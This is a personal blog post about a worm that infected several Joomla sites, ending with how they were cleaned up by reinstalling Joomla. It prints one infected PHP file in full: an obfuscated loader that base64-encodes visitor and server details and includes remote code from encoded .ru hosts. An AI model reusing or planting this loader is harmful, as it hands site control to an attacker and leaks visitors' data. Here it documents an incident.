Renzki's hack report
I got a very urgent call for help from Renzki this afternoon. All his joomla sites got a parse error somewhere in mosce.php file.
After checking googles and joomla forum I understood that it's a hack... or more precisely a worm virus. It's very annoying. Almost in all directories, I see files like remote.php guest.php packages.php tests.php create.php etc... and also .htaccess files. those files contain quite the same script, they are base64_encode-ed so we can understand the files from decoding them.
This is one of them
<? error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1"."/?".$str))){} else {include(base64_decode("aHR0cDovLw==".base64_decode("dXNlcjcuaHRtbHRhZ3MucnU="."/?".$str);
} ?>
When those encoded strings were decoded they are websites... usually
http://xxx.xxx.ru
So they are really virus.
I tried to remove the files manually but they are too much. So we had to reinstall joomla using another path... and rename the jooomla database to be used with the new one. then reinstall one by one all the modules and components and templates. And all that should be done with all infected sites.
That's the problem with open source... (Yes... open source matters) because everybody knows how your files are structured and if they find a hole, then you're kicked off.
And I was supposed to not to work today
Hevitra